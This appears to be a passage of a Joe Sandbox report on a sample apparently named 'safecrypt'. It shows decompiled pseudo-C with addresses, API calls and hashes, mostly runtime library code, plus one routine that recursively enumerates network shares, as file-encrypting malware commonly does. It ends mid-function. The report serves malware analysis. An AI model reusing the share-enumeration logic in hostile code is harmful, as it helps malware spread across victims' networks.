                    0x0042a81d
                    0x0042a823
                    0x0042a82a
                    0x0042a830
                    0x0042a837
                    0x0042a83e
                    0x0042a844
                    0x0042a847
                    0x0042a84a
                    0x0042a84f
                    0x0042a851
                    0x0042a856
                    0x0042a856
                    0x0042a85c
                    0x0042a862
                    0x0042a873

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043A1D0,00000008,0042A8E0,00000000,00000000,?,?,00426D3A,004258DE), ref: 0042A7E9
                    • __lock.LIBCMT ref: 0042A81D
                      • Part of subcall function 0042CD4F: __mtinitlocknum.LIBCMT ref: 0042CD65
                      • Part of subcall function 0042CD4F: __amsg_exit.LIBCMT ref: 0042CD71
                      • Part of subcall function 0042CD4F: EnterCriticalSection.KERNEL32(00000000,00000000,?,0042A822,0000000D), ref: 0042CD79
                    • InterlockedIncrement.KERNEL32(?), ref: 0042A82A
                    • __lock.LIBCMT ref: 0042A83E
                    • ___addlocaleref.LIBCMT ref: 0042A85C
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: KERNEL32.DLL
                    • API String ID: 637971194-2576044830
                    • Opcode ID: 9f8d92b2cf44ebd66823749e1cd988a193dab4839456689aab6e393a28dd2ae3
                    • Instruction ID: 794cabc18b157595e31bd4cefddb00e42657d5536d71df65bbb6301475bdf1ad
                    • Opcode Fuzzy Hash: 9f8d92b2cf44ebd66823749e1cd988a193dab4839456689aab6e393a28dd2ae3
                    • Instruction Fuzzy Hash: 9A018071900700DFD720AF66E80974EFBE0AF14328F50995FE896572E0CBB8A645CB1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00413760(void* _a4) {
                    				int _v8;
                    				int _v12;
                    				void* _t20;
                    				signed int _t26;
                    				void* _t37;
                    				void* _t50;
                    				intOrPtr* _t53;
                    				void* _t54;
                    
                    				_v8 = 0x4000;
                    				_v12 = 0xffffffff;
                    				if(WNetOpenEnumW(2, 0, 0, _a4,  &_a4) == 0) {
                    					_t20 = GlobalAlloc(0x40, _v8);
                    					_t37 = _t20;
                    					if(_t37 != 0) {
                    						while(1) {
                    							E0042C770(_t37, 0, _v8);
                    							_t54 = _t54 + 0xc;
                    							if(WNetEnumResourceW(_a4,  &_v12, _t37,  &_v8) != 0) {
                    								break;
                    							}
                    							_t50 = 0;
                    							if(_v12 > 0) {
                    								_t11 = _t37 + 0x14; // 0x14
                    								_t53 = _t11;
                    								do {
                    									_t29 =  *0x440184;
                    									if( *0x440184 <= 0x40 &&  *((intOrPtr*)(_t53 - 0x14)) == 2 &&  *((intOrPtr*)(_t53 - 0x10)) == 1) {
                    										E00426210((_t29 << 0xb) + 0x440238, 0x400,  *_t53);
                    										_t54 = _t54 + 0xc;
                    										 *0x440184 =  *0x440184 + 1;
                    									}
                    									if(( *(_t53 - 8) & 0x00000002) == 2) {
                    										_t15 = _t53 - 0x14; // 0x0
                    										E00413760(_t15);
                    									}
                    									_t50 = _t50 + 1;
                    									_t53 = _t53 + 0x20;
                    								} while (_t50 < _v12);
                    							}
                    						}
                    						GlobalFree(_t37);
                    						_t26 = WNetCloseEnum(_a4);
                    						asm("sbb eax, eax");
                    						return  ~_t26 + 1;
                    					} else {
                    						return _t20;
                    					}
                    				} else {
                    					return 0;
                    				}
                    			}











                    0x00413774
                    0x0041377b
                    0x0041378a
                    0x0041379b
                    0x004137a1
                    0x004137a5
                    0x004137b0
                    0x004137b7
                    0x004137bf
                    0x004137d4
                    0x00000000
                    0x00000000
                    0x004137d6
                    0x004137db
                    0x004137dd
                    0x004137dd
                    0x004137e0
                    0x004137e0
                    0x004137e8
                    0x00413807
                    0x0041380c
                    0x0041380f
                    0x0041380f
                    0x0041381e
                    0x00413820
                    0x00413824
                    0x00413824
                    0x00413829
                    0x0041382a
                    0x0041382d
                    0x00413832
                    0x004137db
                    0x00413838
                    0x00413842
                    0x0041384b
                    0x00413853
                    0x004137a7
                    0x004137ab
                    0x004137ab
                    0x0041378c
                    0x00413791
                    0x00413791

                    APIs
                    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00413782
                    • GlobalAlloc.KERNEL32(00000040,00004000), ref: 0041379B
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocEnumGlobalOpen
                    • String ID:
                    • API String ID: 3336353811-0
                    • Opcode ID: 27b2b559b776b6c4690c26b4bfb6e4de3451b635195df2fcc787fd503d34deee
                    • Instruction ID: 4f844c565858c7faa4bb316da5fbad27f8503c329a9b64fd63da8fcca27e1d66
                    • Opcode Fuzzy Hash: 27b2b559b776b6c4690c26b4bfb6e4de3451b635195df2fcc787fd503d34deee
                    • Instruction Fuzzy Hash: 8831D7F1600104EFEB20DF94DC85FEBB7B8EB54315F10856AFA0496280D7759E94C7A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00429F5B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				LONG* _t21;
                    				void* _t31;
                    				LONG* _t33;
                    				void* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				_t29 = __edx;
                    				_t25 = __ebx;
                    				_push(0xc);
                    				_push(0x43a170);
                    				E00428D80(__ebx, __edi, __esi);
                    				_t31 = E0042A905(__ebx, __edx, _t35);
                    				_t15 =  *0x43d940; // 0xfffffffe
                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                    					E0042CD4F(_t25, _t31, 0xd);
                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                    					_t33 =  *(_t31 + 0x68);
                    					 *(_t34 - 0x1c) = _t33;
                    					__eflags = _t33 -  *0x43d848; // 0x22d2b80
                    					if(__eflags != 0) {
                    						__eflags = _t33;
                    						if(__eflags != 0) {
                    							__eflags = InterlockedDecrement(_t33);
                    							if(__eflags == 0) {
                    								__eflags = _t33 - 0x43d420;
                    								if(__eflags != 0) {
                    									E004258B8(_t33);
                    								}
                    							}
                    						}
                    						_t21 =  *0x43d848; // 0x22d2b80
                    						 *(_t31 + 0x68) = _t21;
                    						_t33 =  *0x43d848; // 0x22d2b80
                    						 *(_t34 - 0x1c) = _t33;
                    						InterlockedIncrement(_t33);
                    					}
                    					 *(_t34 - 4) = 0xfffffffe;
                    					E00429FF6();
                    				} else {
                    					_t33 =  *(_t31 + 0x68);
                    				}
                    				_t38 = _t33;
                    				if(_t33 == 0) {
                    					_push(0x20);
                    					E0042888C(_t29, _t38);
                    				}
                    				return E00428DC5(_t33);
                    			}









                    0x00429f5b
                    0x00429f5b
                    0x00429f5b
                    0x00429f5b
                    0x00429f5d
                    0x00429f62
                    0x00429f6c
                    0x00429f6e
                    0x00429f76
                    0x00429f97
                    0x00429f9d
                    0x00429fa1
                    0x00429fa4
                    0x00429fa7
                    0x00429fad
                    0x00429faf
                    0x00429fb1
                    0x00429fba
                    0x00429fbc
                    0x00429fbe
                    0x00429fc4
                    0x00429fc7
                    0x00429fcc
                    0x00429fc4
                    0x00429fbc
                    0x00429fcd
                    0x00429fd2
                    0x00429fd5
                    0x00429fdb
                    0x00429fdf
                    0x00429fdf
                    0x00429fe5
                    0x00429fec
                    0x00429f7e
                    0x00429f7e
                    0x00429f7e
                    0x00429f81
                    0x00429f83
                    0x00429f85
                    0x00429f87
                    0x00429f8c
                    0x00429f94

                    APIs
                    • __getptd.LIBCMT ref: 00429F67
                      • Part of subcall function 0042A905: __getptd_noexit.LIBCMT ref: 0042A908
                      • Part of subcall function 0042A905: __amsg_exit.LIBCMT ref: 0042A915
                    • __amsg_exit.LIBCMT ref: 00429F87
                    • __lock.LIBCMT ref: 00429F97
                    • InterlockedDecrement.KERNEL32(?), ref: 00429FB4
                    • _free.LIBCMT ref: 00429FC7
                    • InterlockedIncrement.KERNEL32(022D2B80), ref: 00429FDF
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: e021c20a60162d40ff9a88795f3e910094c4a24248f36599c9ec6f1cf86f1137
                    • Instruction ID: 720709536d1c510a689085673a408230c9cd76516c5df66acc641a0d1243c4c7
                    • Opcode Fuzzy Hash: e021c20a60162d40ff9a88795f3e910094c4a24248f36599c9ec6f1cf86f1137
                    • Instruction Fuzzy Hash: 3201AD32F01631ABDB60AF66B90574E73B0BF04724F96512BE814A7290CB3C6C41CB8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E00403140(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                    				char _v8;
                    				signed int _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				intOrPtr _v36;
                    				signed int _v40;
                    				signed int _t71;
                    				void* _t72;
                    				signed int _t74;
                    				signed int _t82;
                    				signed int _t88;
                    				signed int _t93;
                    				signed int _t98;
                    				void* _t99;
                    				intOrPtr _t100;
                    				void* _t105;
                    				signed int _t121;
                    				signed int _t125;
                    				signed int _t133;
                    				intOrPtr _t134;
                    				void* _t135;
                    				intOrPtr _t136;
                    				signed int _t141;
                    				signed int _t142;
                    
                    				_t120 = __edx;
                    				_t71 = _a20;
                    				_t133 = _a24;
                    				_v40 = 0;
                    				_v8 = 2;
                    				if((_t71 | _t133) != 0) {
                    					_t72 = E0040D2C0(_t71, _t133);
                    					_t141 = _a8;
                    					_t98 = 0x40 - _t72;
                    					__eflags = _t141 - _t133;
                    					if(__eflags >= 0) {
                    						if(__eflags > 0) {
                    							L5:
                    							_t9 =  &_a4;
                    							 *_t9 = _a4 - _a20;
                    							__eflags =  *_t9;
                    							asm("sbb esi, edi");
                    							_a8 = _t141;
                    						} else {
                    							_t120 = _a4;
                    							__eflags = _t120 - _a20;
                    							if(_t120 >= _a20) {
                    								goto L5;
                    							}
                    						}
                    					}
                    					__eflags = _t98;
                    					if(_t98 != 0) {
                    						L00430280();
                    						_a24 = _t133;
                    						L0043027A();
                    						_v16 = _a16;
                    						L00430280();
                    						_t93 = _v16 | _t141;
                    						__eflags = _t93;
                    						_t120 = _a16;
                    						_a8 = _t93;
                    						_a4 = _a12 | _a4;
                    						L00430280();
                    						L8:
                    						_t141 = _a8;
                    						_t133 = _a24;
                    						_a16 = _t120;
                    					}
                    					__eflags = _t141 - _t133;
                    					if(_t141 != _t133) {
                    						L12:
                    						_t99 = 0;
                    						__eflags = 0;
                    						_t74 = E00429CD0(_a4, _t141, _t133, 0);
                    						_v20 = _t74;
                    						_v16 = _t120;
                    						_t142 = _t74;
                    					} else {
                    						_t99 = 0;
                    						__eflags = 0;
                    						if(0 != 0) {
                    							goto L12;
                    						} else {
                    							_t142 = _t141 | 0xffffffff;
                    							_v16 = 0;
                    						}
                    					}
                    					_t121 = _v16;
                    					_t134 = E00430240(_t142, _t121, _t133, _t99);
                    					_t100 = _t121;
                    					_v28 = E00430240(_t142, _v16, _a20, 0);
                    					_t105 = _a4 - _t134;
                    					_v24 = _t121;
                    					asm("sbb eax, ebx");
                    					__eflags = _a8;
                    					if(_a8 == 0) {
                    						while(1) {
                    							_t88 = _a16;
                    							__eflags = _v24 - _t105;
                    							if(__eflags < 0) {
                    								goto L18;
                    							}
                    							if(__eflags > 0) {
                    								L17:
                    								asm("adc dword [ebp-0xc], 0xffffffff");
                    								_t136 = _t134 - _a24;
                    								asm("sbb ebx, ecx");
                    								_v28 = _v28 - _a20;
                    								_v20 = _t142 + 0xffffffff;
                    								asm("sbb [ebp-0x14], ecx");
                    								_t105 = _a4 - _t136;
                    								_v36 = _t136;
                    								asm("sbb esi, ebx");
                    								__eflags = _a8;
                    								_t142 = _v20;
                    								_t134 = _v36;
                    								if(_a8 == 0) {
                    									continue;
                    								}
                    							} else {
                    								__eflags = _v28 - _t88;
                    								if(_v28 > _t88) {
                    									goto L17;
                    								}
                    							}
                    							goto L18;
                    						}
                    					}
                    					L18:
                    					_t135 = _t134 + _v24;
                    					asm("adc ebx, ecx");
                    					__eflags = _a16 - _v28;
                    					if(__eflags <= 0) {
                    						if(__eflags < 0) {
                    							L21:
                    							_t135 = _t135 + 1;
                    							asm("adc ebx, ecx");
                    						} else {
                    							__eflags = _a12;
                    							if(_a12 < 0) {
                    								goto L21;
                    							}
                    						}
                    					}
                    					_a12 = _a12;
                    					_t125 = _a16;
                    					asm("sbb edx, eax");
                    					_t82 = _a4;
                    					__eflags = _a8 - _t100;
                    					if(__eflags <= 0) {
                    						if(__eflags < 0) {
                    							L25:
                    							_t82 = _t82 + _a20;
                    							asm("adc ecx, [ebp+0x1c]");
                    							_t142 = _t142 + 0xffffffff;
                    							asm("adc dword [ebp-0xc], 0xffffffff");
                    						} else {
                    							__eflags = _t82 - _t135;
                    							if(_t82 < _t135) {
                    								goto L25;
                    							}
                    						}
                    					}
                    					_t62 =  &_v8;
                    					 *_t62 = _v8 - 1;
                    					__eflags =  *_t62;
                    					if( *_t62 != 0) {
                    						_v40 = _t142;
                    						_t120 = _a12;
                    						_a8 = _t82 - _t135;
                    						_a4 = _t125;
                    						_a12 = 0;
                    						goto L8;
                    					}
                    					__eflags = _v16 | _v40;
                    					return _t142;
                    				} else {
                    					return _t71 | 0xffffffff;
                    				}
                    			}




























                    0x00403140
                    0x00403146
                    0x0040314c
                    0x00403153
                    0x0040315a
                    0x00403161
                    0x00403172
                    0x00403177
                    0x00403182
                    0x00403184
                    0x00403186
                    0x00403188
                    0x00403192
                    0x00403195
                    0x00403195
                    0x00403195
                    0x00403198
                    0x0040319a
                    0x0040318a
                    0x0040318a
                    0x0040318d
                    0x00403190
                    0x00000000
                    0x00000000
                    0x00403190
                    0x00403188
                    0x0040319d
                    0x0040319f
                    0x004031a8
                    0x004031b3
                    0x004031c0
                    0x004031ca
                    0x004031d1
                    0x004031db
                    0x004031db
                    0x004031dd
                    0x004031e0
                    0x004031e8
                    0x004031eb
                    0x004031f3
                    0x004031f3
                    0x004031f6
                    0x004031f9
                    0x004031f9
                    0x00403202
                    0x00403204
                    0x00403214
                    0x00403217
                    0x00403217
                    0x0040321d
                    0x00403222
                    0x00403225
                    0x00403228
                    0x00403206
                    0x00403206
                    0x00403208
                    0x0040320a
                    0x00000000
                    0x0040320c
                    0x0040320c
                    0x0040320f
                    0x0040320f
                    0x0040320a
                    0x0040322a
                    0x00403236
                    0x00403244
                    0x0040324e
                    0x00403254
                    0x00403256
                    0x00403259
                    0x0040325d
                    0x0040325f
                    0x00403261
                    0x00403265
                    0x0040326a
                    0x0040326d
                    0x00000000
                    0x00000000
                    0x0040326f
                    0x00403276
                    0x00403279
                    0x0040327d
                    0x00403282
                    0x00403287
                    0x0040328c
                    0x0040328f
                    0x00403298
                    0x0040329a
                    0x0040329d
                    0x004032a1
                    0x004032a3
                    0x004032a6
                    0x004032a9
                    0x00000000
                    0x00000000
                    0x00403271
                    0x00403271
                    0x00403274
                    0x00000000
                    0x00000000
                    0x00403274
                    0x00000000
                    0x0040326f
                    0x00403261
                    0x004032ab
                    0x004032b0
                    0x004032b5
                    0x004032b7
                    0x004032ba
                    0x004032bc
                    0x004032c3
                    0x004032c3
                    0x004032c6
                    0x004032be
                    0x004032be
                    0x004032c1
                    0x00000000
                    0x00000000
                    0x004032c1
                    0x004032bc
                    0x004032c8
                    0x004032cb
                    0x004032d1
                    0x004032d3
                    0x004032d6
                    0x004032d8
                    0x004032da
                    0x004032e0
                    0x004032e0
                    0x004032e3
                    0x004032e6
                    0x004032e9
                    0x004032dc
                    0x004032dc
                    0x004032de
                    0x00000000
                    0x00000000
                    0x004032de
                    0x004032da
                    0x004032ef
                    0x004032ef
                    0x004032ef
                    0x004032f2
                    0x004032f4
                    0x004032fb
                    0x00403302
                    0x00403305
                    0x00403308
                    0x00000000
                    0x00403308
                    0x00403319
                    0x00403320
                    0x00403163
                    0x0040316f
                    0x0040316f

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _allshl$_aullshr
                    • String ID:
                    • API String ID: 1546378113-0
                    • Opcode ID: f6b7edbd7186fa5256035f0bbdbf3914fc7760640948aeede850365889856448
                    • Instruction ID: 8885ea01ec3c5572c1f234b64ef950578517bb80382775cee76f00ab7d99983f
                    • Opcode Fuzzy Hash: f6b7edbd7186fa5256035f0bbdbf3914fc7760640948aeede850365889856448
                    • Instruction Fuzzy Hash: 75614F75A002199BCF04DE69C88149FBBB6BF88361F14867EE829A7380D7349E418BD4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 94%
                    			E0042666F(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                    				void* _t7;
                    				long _t8;
                    				intOrPtr* _t9;
                    				intOrPtr* _t12;
                    				long _t27;
                    				long _t30;
                    
                    				if(_a4 != 0) {
                    					_push(__esi);
                    					_t30 = _a8;
                    					__eflags = _t30;
                    					if(_t30 != 0) {
                    						_push(__edi);
                    						while(1) {
                    							__eflags = _t30 - 0xffffffe0;
                    							if(_t30 > 0xffffffe0) {
                    								break;
                    							}
                    							__eflags = _t30;
                    							if(_t30 == 0) {
                    								_t30 = _t30 + 1;
                    								__eflags = _t30;
                    							}
                    							_t7 = HeapReAlloc( *0x43ea98, 0, _a4, _t30);
                    							_t27 = _t7;
                    							__eflags = _t27;
                    							if(_t27 != 0) {
                    								L17:
                    								_t8 = _t27;
                    							} else {
                    								__eflags =  *0x43f0fc - _t7;
                    								if(__eflags == 0) {
                    									_t9 = E00426D35(__eflags);
                    									 *_t9 = E00426CF3(GetLastError());
                    									goto L17;
                    								} else {
                    									__eflags = E00428AC7(_t7, _t30);
                    									if(__eflags == 0) {
                    										_t12 = E00426D35(__eflags);
                    										 *_t12 = E00426CF3(GetLastError());
                    										L12:
                    										_t8 = 0;
                    										__eflags = 0;
                    									} else {
                    										continue;
                    									}
                    								}
                    							}
                    							goto L14;
                    						}
                    						E00428AC7(_t6, _t30);
                    						 *((intOrPtr*)(E00426D35(__eflags))) = 0xc;
                    						goto L12;
                    					} else {
                    						E004258B8(_a4);
                    						_t8 = 0;
                    					}
                    					L14:
                    					return _t8;
                    				} else {
                    					return E004258F2(__edx, __edi, __esi, _a8);
                    				}
                    			}









                    0x00426678
                    0x00426685
                    0x00426686
                    0x00426689
                    0x0042668b
                    0x0042669a
                    0x004266cd
                    0x004266cd
                    0x004266d0
                    0x00000000
                    0x00000000
                    0x0042669d
                    0x0042669f
                    0x004266a1
                    0x004266a1
                    0x004266a1
                    0x004266ae
                    0x004266b4
                    0x004266b6
                    0x004266b8
                    0x00426718
                    0x00426718
                    0x004266ba
                    0x004266ba
                    0x004266c0
                    0x00426702
                    0x00426716
                    0x00000000
                    0x004266c2
                    0x004266c9
                    0x004266cb
                    0x004266ea
                    0x004266fe
                    0x004266e4
                    0x004266e4
                    0x004266e4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004266cb
                    0x004266c0
                    0x00000000
                    0x004266e6
                    0x004266d3
                    0x004266de
                    0x00000000
                    0x0042668d
                    0x00426690
                    0x00426696
                    0x00426696
                    0x004266e7
                    0x004266e9
                    0x0042667a
                    0x00426684
                    0x00426684

                    APIs
                    • _malloc.LIBCMT ref: 0042667D
                      • Part of subcall function 004258F2: __FF_MSGBANNER.LIBCMT ref: 0042590B
                      • Part of subcall function 004258F2: __NMSG_WRITE.LIBCMT ref: 00425912
                      • Part of subcall function 004258F2: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042C81E,00000000,00000001,00000000,?,0042CCDA,00000018,0043A2C8,0000000C,0042CD6A), ref: 00425937
                    • _free.LIBCMT ref: 00426690
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: de2577a03ee5e8e19d6adbe9e1fa5057656cfa3fda24e545a2d493b291012908
                    • Instruction ID: 2e3f7985fa8f610552a50c249afd44bd4e663d28a17fcfda2a4d696c366f830e
                    • Opcode Fuzzy Hash: de2577a03ee5e8e19d6adbe9e1fa5057656cfa3fda24e545a2d493b291012908
                    • Instruction Fuzzy Hash: CF11CB3270163566CB213F7ABC05A5E3694AF44364FA6443FF85986251DE3CC851869C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0042A6DC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t12;
                    				void* _t28;
                    				intOrPtr _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t31 = __eflags;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t20 = __ebx;
                    				_push(0xc);
                    				_push(0x43a1b0);
                    				E00428D80(__ebx, __edi, __esi);
                    				_t28 = E0042A905(__ebx, __edx, _t31);
                    				_t12 =  *0x43d940; // 0xfffffffe
                    				if(( *(_t28 + 0x70) & _t12) == 0) {
                    					L6:
                    					E0042CD4F(_t20, _t26, 0xc);
                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                    					_t29 = _t28 + 0x6c;
                    					 *((intOrPtr*)(_t30 - 0x1c)) = E0042A68F(_t29,  *0x43db88);
                    					 *(_t30 - 4) = 0xfffffffe;
                    					E0042A749();
                    				} else {
                    					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                    					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                    						goto L6;
                    					} else {
                    						_t29 =  *((intOrPtr*)(E0042A905(_t20, __edx, _t33) + 0x6c));
                    					}
                    				}
                    				_t34 = _t29;
                    				if(_t29 == 0) {
                    					_push(0x20);
                    					E0042888C(_t25, _t34);
                    				}
                    				return E00428DC5(_t29);
                    			}








                    0x0042a6dc
                    0x0042a6dc
                    0x0042a6dc
                    0x0042a6dc
                    0x0042a6dc
                    0x0042a6de
                    0x0042a6e3
                    0x0042a6ed
                    0x0042a6ef
                    0x0042a6f7
                    0x0042a71b
                    0x0042a71d
                    0x0042a723
                    0x0042a72d
                    0x0042a738
                    0x0042a73b
                    0x0042a742
                    0x0042a6f9
                    0x0042a6f9
                    0x0042a6fd
                    0x00000000
                    0x0042a6ff
                    0x0042a704
                    0x0042a704
                    0x0042a6fd
                    0x0042a707
                    0x0042a709
                    0x0042a70b
                    0x0042a70d
                    0x0042a712
                    0x0042a71a

                    APIs
                    • __getptd.LIBCMT ref: 0042A6E8
                      • Part of subcall function 0042A905: __getptd_noexit.LIBCMT ref: 0042A908
                      • Part of subcall function 0042A905: __amsg_exit.LIBCMT ref: 0042A915
                    • __getptd.LIBCMT ref: 0042A6FF
                    • __amsg_exit.LIBCMT ref: 0042A70D
                    • __lock.LIBCMT ref: 0042A71D
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0042A731
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: f2fbc420132d43194b25b7664847a4a3129b6147077e52b926ff3ca479f20944
                    • Instruction ID: 7b311f60bf9219c79d71d473f93f387e982dc467ed98d4c56549f80763a8f37f
                    • Opcode Fuzzy Hash: f2fbc420132d43194b25b7664847a4a3129b6147077e52b926ff3ca479f20944
                    • Instruction Fuzzy Hash: D5F09631B017349BD720BB6AB80670E33B06F40728F96421FF940572D2CF2C9960865F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0040F120(intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t161;
                    				signed int _t162;
                    				signed int _t172;
                    				signed int _t177;
                    				void* _t181;
                    				intOrPtr _t182;
                    				signed int _t185;
                    				signed int _t186;
                    				signed int _t187;
                    				intOrPtr _t237;
                    				intOrPtr _t238;
                    				signed int _t241;
                    				signed int _t248;
                    				intOrPtr _t251;
                    				intOrPtr _t253;
                    				signed int* _t257;
                    				signed int _t290;
                    				intOrPtr _t293;
                    				intOrPtr _t296;
                    				intOrPtr _t297;
                    				signed int _t300;
                    				signed int _t301;
                    				intOrPtr _t332;
                    				void* _t334;
                    				signed int _t335;
                    				signed int _t336;
                    				signed int _t339;
                    				intOrPtr _t344;
                    				void* _t347;
                    				signed int _t350;
                    				void* _t354;
                    				void* _t355;
                    				void* _t356;
                    
                    				_t241 = _a16;
                    				_t355 = _t354 - 0x20;
                    				if(_t241 >= 8) {
                    					_t332 = _a24;
                    					_t344 = _a20;
                    					_v12 = _a8 + _t241 * 8;
                    					_v8 = _a12 + _t241 * 8;
                    					_v32 = 0;
                    					_v28 = _t241 - _t344;
                    					_v24 = _t332 - _t241;
                    					_v36 = E0040DCB0(_t241 - _t344, _t344, _a8, _v12) + _t158 * 2;
                    					_t161 = E0040DCB0(_t332 - _t241, _t332, _v8, _a12);
                    					_t237 = _a28;
                    					_t30 = _t161 + 4; // 0x40f7f5
                    					_t162 = _v36 + _t30;
                    					_t356 = _t355 + 0x10;
                    					__eflags = _t162 - 8;
                    					if(_t162 <= 8) {
                    						switch( *((intOrPtr*)(_t162 * 4 +  &M0040F550))) {
                    							case 0:
                    								E0040EA50(_v12, _t237, _a8, _t344, _t344 - _a16);
                    								_t228 = _a16;
                    								_t367 = _t356 + 0xc;
                    								_push(_t228 - _t332);
                    								_push(_t332);
                    								_t282 = _t237 + _t228 * 8;
                    								_t229 = _a12;
                    								_push(_v8);
                    								goto L8;
                    							case 1:
                    								__ecx = _a8;
                    								__esi = __esi - _a16;
                    								__eax = _v12;
                    								__ecx = __ebx;
                    								__eax = E0040EA50(_v12, __ebx, _a8, __esi, __esi - _a16);
                    								__edx = _v24;
                    								__eax = _a12;
                    								__ecx = _a16;
                    								__eax = _v8;
                    								__ecx = __ebx + _a16 * 8;
                    								__eax = E0040EA50(_v8, __ecx, _a12, __edi, _v24);
                    								_v32 = 1;
                    								goto L9;
                    							case 2:
                    								__edx = _v28;
                    								__eax = _v12;
                    								__eax = _a8;
                    								__ecx = __ebx;
                    								__eax = E0040EA50(_a8, __ebx, _v12, __esi, _v28);
                    								__eax = _a16;
                    								__edx = _v8;
                    								__ecx = __ebx + (_a12 - __edi) * 8;
                    								__eax = _a12;
                    								__eax = E0040EA50(_a12, __ecx, _v8, __edi, _a12 - __edi);
                    								_v32 = 1;
                    								goto L9;
                    							case 3:
                    								__eax = _v28;
                    								__ecx = _v12;
                    								__eax = _a8;
                    								__ecx = __ebx;
                    								__eax = E0040EA50(_a8, __ebx, _v12, __esi, _v28);
                    								__edx = _v24;
                    								__eax = _a12;
                    								__ecx = _a16;
                    								_push(_v24);
                    								_push(__edi);
                    								_push(_a12);
                    								__eax = _v8;
                    								__ecx = __ebx + _a16 * 8;
                    								L8:
                    								E0040EA50(_t229, _t282);
                    								L9:
                    								_t356 = _t367 + 0xc;
                    								goto L10;
                    						}
                    					}
                    					L10:
                    					_t248 = _a16;
                    					__eflags = _t248 - 8;
                    					if(__eflags != 0) {
                    						_t290 = _t248 + _t248;
                    						_v20 = (_t290 << 4) + _t237;
                    						_t293 = _t290 + _t290 + _t290 + _t290 + _t290 + _t290 + _t290 + _t290;
                    						_v24 = _t293;
                    						_v28 = _t293 + _t237;
                    						E0040ECE0(_t293 + _t237, _t293 + _t237, _t237, _t237 + _t248 * 8, _t248, 0, 0, (_t290 << 4) + _t237);
                    						_t296 = _a4;
